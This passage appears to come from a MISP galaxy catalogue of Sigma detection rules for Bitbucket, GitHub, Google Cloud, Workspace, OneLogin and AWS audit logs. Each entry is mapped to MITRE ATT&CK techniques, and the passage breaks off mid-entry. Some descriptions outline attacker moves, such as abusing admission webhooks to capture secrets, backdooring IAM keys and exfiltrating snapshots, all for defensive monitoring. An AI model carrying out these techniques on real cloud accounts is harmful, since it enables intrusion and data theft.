https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/threat_detection/microsoft365_from_susp_ip_addresses.yml

Bitbucket Unauthorized Access To A Resource

Detects unauthorized access attempts to a resource.

The tag is: misp-galaxy:sigma-rules="Bitbucket Unauthorized Access To A Resource"

Bitbucket Unauthorized Access To A Resource has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Compromise Accounts - T1586" with estimative-language:likelihood-probability="almost-certain"

Table 11179. Table References

Links

https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/bitbucket/audit/bitbucket_audit_unauthorized_access_detected.yml

Bitbucket Global SSH Settings Changed

Detects Bitbucket global SSH access configuration changes.

The tag is: misp-galaxy:sigma-rules="Bitbucket Global SSH Settings Changed"

Bitbucket Global SSH Settings Changed has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="SSH - T1021.004" with estimative-language:likelihood-probability="almost-certain"

Table 11180. Table References

Links

https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html

https://confluence.atlassian.com/bitbucketserver/enable-ssh-access-to-git-repositories-776640358.html

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/bitbucket/audit/bitbucket_audit_global_ssh_settings_change_detected.yml

Bitbucket Secret Scanning Exempt Repository Added

Detects when a repository is exempted from the secret scanning feature.

The tag is: misp-galaxy:sigma-rules="Bitbucket Secret Scanning Exempt Repository Added"

Bitbucket Secret Scanning Exempt Repository Added has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 11181. Table References

Links

https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html

https://confluence.atlassian.com/bitbucketserver/secret-scanning-1157471613.html

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/bitbucket/audit/bitbucket_audit_secret_scanning_exempt_repository_detected.yml

Bitbucket User Permissions Export Attempt

Detects a user permission data export attempt.

The tag is: misp-galaxy:sigma-rules="Bitbucket User Permissions Export Attempt"

Bitbucket User Permissions Export Attempt has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Data from Information Repositories - T1213" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Identify Roles - T1591.004" with estimative-language:likelihood-probability="almost-certain"

Table 11182. Table References

Links

https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html

https://confluence.atlassian.com/bitbucketserver/users-and-groups-776640439.html

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/bitbucket/audit/bitbucket_audit_user_permissions_export_attempt_detected.yml

Bitbucket Audit Log Configuration Updated

Detects changes to the Bitbucket audit log configuration.

The tag is: misp-galaxy:sigma-rules="Bitbucket Audit Log Configuration Updated"

Bitbucket Audit Log Configuration Updated has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 11183. Table References

Links

https://confluence.atlassian.com/bitbucketserver/view-and-configure-the-audit-log-776640417.html

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/bitbucket/audit/bitbucket_audit_log_configuration_update_detected.yml

Bitbucket Secret Scanning Rule Deleted

Detects when a secret scanning rule is deleted for a project or repository.

The tag is: misp-galaxy:sigma-rules="Bitbucket Secret Scanning Rule Deleted"

Bitbucket Secret Scanning Rule Deleted has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 11184. Table References

Links

https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html

https://confluence.atlassian.com/bitbucketserver/secret-scanning-1157471613.html

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/bitbucket/audit/bitbucket_audit_secret_scanning_rule_deleted.yml

Bitbucket Full Data Export Triggered

Detects when a full data export is attempted.

The tag is: misp-galaxy:sigma-rules="Bitbucket Full Data Export Triggered"

Bitbucket Full Data Export Triggered has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Code Repositories - T1213.003" with estimative-language:likelihood-probability="almost-certain"

Table 11185. Table References

Links

https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html

https://confluence.atlassian.com/adminjiraserver0811/importing-and-exporting-data-1019391889.html

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/bitbucket/audit/bitbucket_audit_full_data_export_triggered.yml

Bitbucket Global Permission Changed

Detects global permissions change activity.

The tag is: misp-galaxy:sigma-rules="Bitbucket Global Permission Changed"

Bitbucket Global Permission Changed has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Account Manipulation - T1098" with estimative-language:likelihood-probability="almost-certain"

Table 11186. Table References

Links

https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html

https://confluence.atlassian.com/bitbucketserver/global-permissions-776640369.html

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/bitbucket/audit/bitbucket_audit_global_permissions_change_detected.yml

Bitbucket Project Secret Scanning Allowlist Added

Detects when a secret scanning allowlist rule is added for projects.

The tag is: misp-galaxy:sigma-rules="Bitbucket Project Secret Scanning Allowlist Added"

Bitbucket Project Secret Scanning Allowlist Added has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 11187. Table References

Links

https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html

https://confluence.atlassian.com/bitbucketserver/secret-scanning-1157471613.html

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/bitbucket/audit/bitbucket_audit_project_secret_scanning_allowlist_added.yml

Bitbucket User Login Failure Via SSH

Detects SSH user login access failures. Please note that this rule can be noisy; it is recommended to use it with correlation based on the "author.name" field.

The tag is: misp-galaxy:sigma-rules="Bitbucket User Login Failure Via SSH"

Bitbucket User Login Failure Via SSH has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="SSH - T1021.004" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Brute Force - T1110" with estimative-language:likelihood-probability="almost-certain"

Table 11188. Table References

Links

https://confluence.atlassian.com/bitbucketserver/enable-ssh-access-to-git-repositories-776640358.html

https://confluence.atlassian.com/bitbucketserver/view-and-configure-the-audit-log-776640417.html

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/bitbucket/audit/bitbucket_audit_user_login_failure_via_ssh_detected.yml

Bitbucket Unauthorized Full Data Export Triggered

Detects when a full data export is attempted by an unauthorized user.

The tag is: misp-galaxy:sigma-rules="Bitbucket Unauthorized Full Data Export Triggered"

Bitbucket Unauthorized Full Data Export Triggered has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Code Repositories - T1213.003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Compromise Accounts - T1586" with estimative-language:likelihood-probability="almost-certain"

Table 11189. Table References

Links

https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html

https://confluence.atlassian.com/bitbucketserver/secret-scanning-1157471613.html

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/bitbucket/audit/bitbucket_audit_unauthorized_full_data_export_triggered.yml

Bitbucket Global Secret Scanning Rule Deleted

Detects Bitbucket global secret scanning rule deletion activity.

The tag is: misp-galaxy:sigma-rules="Bitbucket Global Secret Scanning Rule Deleted"

Bitbucket Global Secret Scanning Rule Deleted has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 11190. Table References

Links

https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html

https://confluence.atlassian.com/bitbucketserver/secret-scanning-1157471613.html

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/bitbucket/audit/bitbucket_audit_global_secret_scanning_rule_deleted.yml

Bitbucket User Details Export Attempt Detected

Detects user data export activity.

The tag is: misp-galaxy:sigma-rules="Bitbucket User Details Export Attempt Detected"

Bitbucket User Details Export Attempt Detected has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Data from Information Repositories - T1213" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Identify Roles - T1591.004" with estimative-language:likelihood-probability="almost-certain"

Table 11191. Table References

Links

https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html

https://support.atlassian.com/security-and-access-policies/docs/export-user-accounts

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/bitbucket/audit/bitbucket_audit_user_details_export_attempt_detected.yml

Bitbucket User Login Failure

Detects user authentication failure events. Please note that this rule can be noisy; it is recommended to use it with correlation based on the "author.name" field.

The tag is: misp-galaxy:sigma-rules="Bitbucket User Login Failure"

Bitbucket User Login Failure has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1078.004" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Brute Force - T1110" with estimative-language:likelihood-probability="almost-certain"

Table 11192. Table References

Links

https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/bitbucket/audit/bitbucket_audit_user_login_failure_detected.yml

New Github Organization Member Added

Detects when a new member is added or invited to a GitHub organization.

The tag is: misp-galaxy:sigma-rules="New Github Organization Member Added"

New Github Organization Member Added has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Account - T1136.003" with estimative-language:likelihood-probability="almost-certain"

Table 11193. Table References

Links

https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#dependabot_alerts-category-actions

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/github/github_new_org_member.yml

Github New Secret Created

Detects when a user creates an Actions secret for the organization, environment, Codespaces or repository.

The tag is: misp-galaxy:sigma-rules="Github New Secret Created"

Github New Secret Created has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1078.004" with estimative-language:likelihood-probability="almost-certain"

Table 11194. Table References

Links

https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#audit-log-actions

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/github/github_new_secret_created.yml

Github Delete Action Invoked

Detects delete actions in the GitHub audit logs for Codespaces, environments, projects and repositories.

The tag is: misp-galaxy:sigma-rules="Github Delete Action Invoked"

Github Delete Action Invoked has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Code Repositories - T1213.003" with estimative-language:likelihood-probability="almost-certain"

Table 11195. Table References

Links

https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#audit-log-actions

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/github/github_delete_action_invoked.yml

Github Outside Collaborator Detected

Detects when an organization member or an outside collaborator is added to or removed from a project board or has their permission level changed; when an owner removes an outside collaborator from an organization; or when two-factor authentication is required in an organization and an outside collaborator does not use 2FA or disables 2FA.

The tag is: misp-galaxy:sigma-rules="Github Outside Collaborator Detected"

Github Outside Collaborator Detected has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Additional Cloud Credentials - T1098.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Additional Cloud Roles - T1098.003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Code Repositories - T1213.003" with estimative-language:likelihood-probability="almost-certain"

Table 11196. Table References

Links

https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#audit-log-actions

https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-two-factor-authentication-for-your-organization/requiring-two-factor-authentication-in-your-organization

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/github/github_outside_collaborator_detected.yml

Github Self Hosted Runner Changes Detected

A self-hosted runner is a system that you deploy and manage to execute jobs from GitHub Actions on GitHub.com. This rule detects changes to self-hosted runner configurations in the environment. Once a self-hosted runner configuration change is detected, it should be validated in the GitHub UI because the log entry may not provide full context.

The tag is: misp-galaxy:sigma-rules="Github Self Hosted Runner Changes Detected"

Github Self Hosted Runner Changes Detected has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Service Discovery - T1526" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Code Repositories - T1213.003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1078.004" with estimative-language:likelihood-probability="almost-certain"

Table 11198. Table References

Links

https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#search-based-on-operation

https://docs.github.com/en/actions/hosting-your-own-runners/about-self-hosted-runners#about-self-hosted-runners

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/github/github_self_hosted_runner_changes_detected.yml

Outdated Dependency Or Vulnerability Alert Disabled

Dependabot performs a scan to detect insecure dependencies and sends Dependabot alerts. This rule detects when an organization owner disables Dependabot alerts for private repositories or Dependabot security updates for all repositories.

The tag is: misp-galaxy:sigma-rules="Outdated Dependency Or Vulnerability Alert Disabled"

Outdated Dependency Or Vulnerability Alert Disabled has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Compromise Software Dependencies and Development Tools - T1195.001" with estimative-language:likelihood-probability="almost-certain"

Table 11199. Table References

Links

https://docs.github.com/en/code-security/dependabot/dependabot-alerts/about-dependabot-alerts

https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/managing-security-and-analysis-settings-for-your-organization

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/github/github_disabled_outdated_dependency_or_vulnerability.yml

Google Cloud DNS Zone Modified or Deleted

Identifies when a DNS Zone is modified or deleted in Google Cloud.

The tag is: misp-galaxy:sigma-rules="Google Cloud DNS Zone Modified or Deleted"

Table 11200. Table References

Links

https://cloud.google.com/dns/docs/reference/v1/managedZones

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/audit/gcp_dns_zone_modified_or_deleted.yml

Google Cloud Kubernetes Secrets Modified or Deleted

Identifies when Kubernetes Secrets are modified or deleted in Google Cloud.

The tag is: misp-galaxy:sigma-rules="Google Cloud Kubernetes Secrets Modified or Deleted"

Table 11201. Table References

Links

https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/audit/gcp_kubernetes_secrets_modified_or_deleted.yml

Google Cloud SQL Database Modified or Deleted

Detect when a Cloud SQL DB has been modified or deleted.

The tag is: misp-galaxy:sigma-rules="Google Cloud SQL Database Modified or Deleted"

Table 11202. Table References

Links

https://cloud.google.com/sql/docs/mysql/admin-api/rest/v1beta4/users/update

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/audit/gcp_sql_database_modified_or_deleted.yml

Google Cloud Service Account Modified

Identifies when a service account is modified in Google Cloud.

The tag is: misp-galaxy:sigma-rules="Google Cloud Service Account Modified"

Table 11203. Table References

Links

https://cloud.google.com/iam/docs/reference/rest/v1/projects.serviceAccounts

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/audit/gcp_service_account_modified.yml

Google Cloud Storage Buckets Enumeration

Detects when a storage bucket is enumerated in Google Cloud.

The tag is: misp-galaxy:sigma-rules="Google Cloud Storage Buckets Enumeration"

Table 11205. Table References

Links

https://cloud.google.com/storage/docs/json_api/v1/buckets

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/audit/gcp_bucket_enumeration.yml

GCP Break-glass Container Workload Deployed

Detects the deployment of workloads that are deployed by using the break-glass flag to override Binary Authorization controls.

The tag is: misp-galaxy:sigma-rules="GCP Break-glass Container Workload Deployed"

GCP Break-glass Container Workload Deployed has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Abuse Elevation Control Mechanism - T1548" with estimative-language:likelihood-probability="almost-certain"

Table 11206. Table References

Links

https://cloud.google.com/binary-authorization

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/audit/gcp_breakglass_container_workload_deployed.yml

Google Cloud Kubernetes CronJob

Identifies when a Google Cloud Kubernetes CronJob runs in Google Cloud. A Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Kubernetes Jobs can be used to run containers that perform finite tasks for batch jobs. A Kubernetes CronJob is used to schedule Jobs. An adversary may use a Kubernetes CronJob to schedule execution of malicious code that would run as a container in the cluster.

The tag is: misp-galaxy:sigma-rules="Google Cloud Kubernetes CronJob"

Table 11207. Table References

Links

https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/

https://kubernetes.io/docs/concepts/workloads/controllers/job/

https://cloud.google.com/kubernetes-engine/docs

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/audit/gcp_kubernetes_cronjob.yml

Google Cloud VPN Tunnel Modified or Deleted

Identifies when a VPN tunnel is modified or deleted in Google Cloud.

The tag is: misp-galaxy:sigma-rules="Google Cloud VPN Tunnel Modified or Deleted"

Table 11208. Table References

Links

https://any-api.com/googleapis_com/compute/docs/vpnTunnels

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/audit/gcp_vpn_tunnel_modified_or_deleted.yml

Google Cloud Firewall Modified or Deleted

Detects when a firewall rule is modified or deleted in Google Cloud Platform (GCP).

The tag is: misp-galaxy:sigma-rules="Google Cloud Firewall Modified or Deleted"

Google Cloud Firewall Modified or Deleted has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Impair Defenses - T1562" with estimative-language:likelihood-probability="almost-certain"

Table 11209. Table References

Links

https://developers.google.com/resources/api-libraries/documentation/compute/v1/java/latest/com/google/api/services/compute/Compute.Firewalls.html

https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/audit/gcp_firewall_rule_modified_or_deleted.yml

Google Cloud Re-identifies Sensitive Information

Identifies when sensitive information is re-identified in Google Cloud.

The tag is: misp-galaxy:sigma-rules="Google Cloud Re-identifies Sensitive Information"

Google Cloud Re-identifies Sensitive Information has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Data Manipulation - T1565" with estimative-language:likelihood-probability="almost-certain"

Table 11210. Table References

Links

https://cloud.google.com/dlp/docs/reference/rest/v2/projects.content/reidentify

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/audit/gcp_dlp_re_identifies_sensitive_information.yml

Google Cloud Kubernetes Admission Controller

Identifies when an admission controller is executed in GCP Kubernetes. A Kubernetes admission controller intercepts, and possibly modifies, requests to the Kubernetes API server. The behavior of this admission controller is determined by an admission webhook (MutatingAdmissionWebhook or ValidatingAdmissionWebhook) that the user deploys in the cluster. An adversary can use a webhook such as the MutatingAdmissionWebhook to obtain persistence in the cluster; for example, attackers can intercept and modify pod creation operations in the cluster and add their malicious container to every created pod. An adversary can also use the ValidatingAdmissionWebhook to obtain access credentials, by intercepting requests to the API server and recording secrets and other sensitive information.

The tag is: misp-galaxy:sigma-rules="Google Cloud Kubernetes Admission Controller"

Google Cloud Kubernetes Admission Controller has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Unsecured Credentials - T1552" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Container API - T1552.007" with estimative-language:likelihood-probability="almost-certain"

Table 11211. Table References

Links

https://cloud.google.com/kubernetes-engine/docs

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/audit/gcp_kubernetes_admission_controller.yml

Google Cloud Service Account Disabled or Deleted

Identifies when a service account is disabled or deleted in Google Cloud.

The tag is: misp-galaxy:sigma-rules="Google Cloud Service Account Disabled or Deleted"

Google Cloud Service Account Disabled or Deleted has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Account Access Removal - T1531" with estimative-language:likelihood-probability="almost-certain"

Table 11212. Table References

Links

https://cloud.google.com/iam/docs/reference/rest/v1/projects.serviceAccounts

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/audit/gcp_service_account_disabled_or_deleted.yml

Google Cloud Storage Buckets Modified or Deleted

Detects when a storage bucket is modified or deleted in Google Cloud.

The tag is: misp-galaxy:sigma-rules="Google Cloud Storage Buckets Modified or Deleted"

Table 11213. Table References

Links

https://cloud.google.com/storage/docs/json_api/v1/buckets

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/audit/gcp_bucket_modified_or_deleted.yml

Google Full Network Traffic Packet Capture

Identifies potential full network packet capture in GCP. This feature can potentially be abused to read sensitive data from unencrypted internal traffic.

The tag is: misp-galaxy:sigma-rules="Google Full Network Traffic Packet Capture"

Google Full Network Traffic Packet Capture has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Data Staged - T1074" with estimative-language:likelihood-probability="almost-certain"

Table 11214. Table References

Links

https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging

https://developers.google.com/resources/api-libraries/documentation/compute/v1/java/latest/com/google/api/services/compute/Compute.PacketMirrorings.html

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/audit/gcp_full_network_traffic_packet_capture.yml

GCP Access Policy Deleted

Detects when an access policy that is applied to a GCP cloud resource is deleted. An adversary would be able to remove access policies to gain access to a GCP cloud resource.

The tag is: misp-galaxy:sigma-rules="GCP Access Policy Deleted"

GCP Access Policy Deleted has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Account Manipulation - T1098" with estimative-language:likelihood-probability="almost-certain"

Table 11215. Table References

Links

https://cloud.google.com/logging/docs/reference/audit/auditlog/rest/Shared.Types/AuditLog

https://cloud.google.com/logging/docs/audit/understanding-audit-logs

https://cloud.google.com/access-context-manager/docs/audit-logging

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/audit/gcp_access_policy_deleted.yml

Google Workspace Application Access Level Modified

Detects when an access level is changed for a Google Workspace application. An access level is part of BeyondCorp Enterprise, which is Google Workspace's way of enforcing the Zero Trust model. An adversary would be able to remove access levels to gain easier access to Google Workspace resources.

The tag is: misp-galaxy:sigma-rules="Google Workspace Application Access Level Modified"

Google Workspace Application Access Level Modified has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Additional Cloud Roles - T1098.003" with estimative-language:likelihood-probability="almost-certain"

Table 11218. Table References

Links

https://support.google.com/a/answer/9261439

https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-application-settings

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gworkspace/gcp_gworkspace_application_access_levels_modified.yml

Google Workspace Granted Domain API Access

Detects when an API access service account is granted domain authority.

The tag is: misp-galaxy:sigma-rules="Google Workspace Granted Domain API Access"

Google Workspace Granted Domain API Access has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Account Manipulation - T1098" with estimative-language:likelihood-probability="almost-certain"

Table 11220. Table References

Links

https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3

https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings#AUTHORIZE_API_CLIENT_ACCESS

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gworkspace/gcp_gworkspace_granted_domain_api_access.yml

Google Workspace User Granted Admin Privileges

Detects when a Google Workspace user is granted admin privileges.

The tag is: misp-galaxy:sigma-rules="Google Workspace User Granted Admin Privileges"

Google Workspace User Granted Admin Privileges has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Account Manipulation - T1098" with estimative-language:likelihood-probability="almost-certain"

Table 11221. Table References

Links

https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3

https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-user-settings#GRANT_ADMIN_PRIVILEGE

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gworkspace/gcp_gworkspace_user_granted_admin_privileges.yml

OneLogin User Assumed Another User

Detects when a user assumed another user account.

The tag is: misp-galaxy:sigma-rules="OneLogin User Assumed Another User"

Table 11223. Table References

Links

https://developers.onelogin.com/api-docs/1/events/event-resource

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/onelogin/onelogin_assumed_another_user.yml

OneLogin User Account Locked

Detects when a user account is locked or suspended.

The tag is: misp-galaxy:sigma-rules="OneLogin User Account Locked"

Table 11224. Table References

Links

https://developers.onelogin.com/api-docs/1/events/event-resource/

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/onelogin/onelogin_user_account_locked.yml

AWS EC2 Disable EBS Encryption

Identifies disabling of default Amazon Elastic Block Store (EBS) encryption in the current region. Disabling default encryption does not change the encryption status of your existing volumes.

The tag is: misp-galaxy:sigma-rules="AWS EC2 Disable EBS Encryption"

AWS EC2 Disable EBS Encryption has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Data Manipulation - T1565" with estimative-language:likelihood-probability="almost-certain"

Table 11226. Table References

Links

https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DisableEbsEncryptionByDefault.html

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_ec2_disable_encryption.yml

AWS IAM Backdoor Users Keys

Detects AWS API key creation for a user by another user. Backdoored users can be used to obtain persistence in the AWS environment. This alert also lets you track the flow of AWS keys in your organization.

The tag is: misp-galaxy:sigma-rules="AWS IAM Backdoor Users Keys"

AWS IAM Backdoor Users Keys has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Account Manipulation - T1098" with estimative-language:likelihood-probability="almost-certain"

Table 11227. Table References

Links

https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/iambackdoor_users_keys/main.py

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_iam_backdoor_users_keys.yml

AWS SecurityHub Findings Evasion

Detects the modification of the findings on SecurityHub.

The tag is: misp-galaxy:sigma-rules="AWS SecurityHub Findings Evasion"

AWS SecurityHub Findings Evasion has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Impair Defenses - T1562" with estimative-language:likelihood-probability="almost-certain"

Table 11228. Table References

Links

https://docs.aws.amazon.com/cli/latest/reference/securityhub/

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_securityhub_finding_evasion.yml

SES Identity Has Been Deleted

Detects an instance of an SES identity being deleted via the "DeleteIdentity" event. This may be an indicator of an adversary removing the account that carried out suspicious or malicious activities.

The tag is: misp-galaxy:sigma-rules="SES Identity Has Been Deleted"

SES Identity Has Been Deleted has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Indicator Removal - T1070" with estimative-language:likelihood-probability="almost-certain"

Table 11229. Table References

Links

https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_delete_identity.yml

AWS Snapshot Backup Exfiltration

Detects the modification of an EC2 snapshot's permissions to enable access from another account.

The tag is: misp-galaxy:sigma-rules="AWS Snapshot Backup Exfiltration"

AWS Snapshot Backup Exfiltration has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Transfer Data to Cloud Account - T1537" with estimative-language:likelihood-probability="almost-certain"

Table 11230. Table References

Links

https://www.justice.gov/file/1080281/download

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_snapshot_backup_exfiltration.yml

AWS EFS Fileshare Mount Modified or Deleted

Detects when an EFS Fileshare Mount is modified or deleted. An adversary could break any file system that uses the mount target being deleted, which might disrupt instances or applications using those mounts.

The tag is: misp-galaxy:sigma-rules="AWS EFS Fileshare Mount Modified or Deleted"

AWS EFS Fileshare Mount Modified or Deleted has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Data Destruction - T1485" with estimative-language:likelihood-probability="almost-certain"

Table 11231. Table References

Links

https://docs.aws.amazon.com/efs/latest/ug/API_DeleteMountTarget.html

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_efs_fileshare_mount_modified_or_deleted.yml

AWS Route 53 Domain Transferred to Another Account

Detects when a request has been made to transfer a Route 53 domain to another AWS account.

The tag is: misp-galaxy:sigma-rules="AWS Route 53 Domain Transferred to Another Account"

AWS Route 53 Domain Transferred to Another Account has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Account Manipulation - T1098" with estimative-language:likelihood-probability="almost-certain"

Table 11232. Table References

Links

https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/integrations/aws/persistence_route_53_domain_transferred_to_another_account.toml

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_route_53_domain_transferred_to_another_account.yml

AWS STS AssumeRole Misuse

Identifies the suspicious use of AssumeRole. Attackers could move laterally and escalate privileges.

